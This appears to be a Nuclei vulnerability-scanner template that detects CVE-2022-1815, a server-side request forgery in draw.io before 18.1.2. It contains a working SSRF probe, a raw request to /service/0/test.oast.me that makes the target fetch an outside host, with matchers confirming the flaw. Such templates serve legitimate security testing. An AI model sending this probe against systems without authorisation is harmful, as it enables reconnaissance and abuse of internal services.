28 lines
774 B
YAML
28 lines
774 B
YAML
id: CVE-2022-1815
|
|
|
|
info:
|
|
name: Drawio < 18.1.2 - Server Side Request Forgery
|
|
author: amit-jd
|
|
severity: medium
|
|
description: |
|
|
SSRF in /service endpoint in jgraph/drawio prior to 18.1.2. Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.1.2.
|
|
reference:
|
|
- https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1815
|
|
metadata:
|
|
verified: true
|
|
tags: cve,cve2022,drawio,ssrf,oast,oss,jgraph
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /service/0/test.oast.me HTTP/2
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "contains(body, 'Interactsh Server')"
|
|
- status_code == 200
|
|
condition: and
|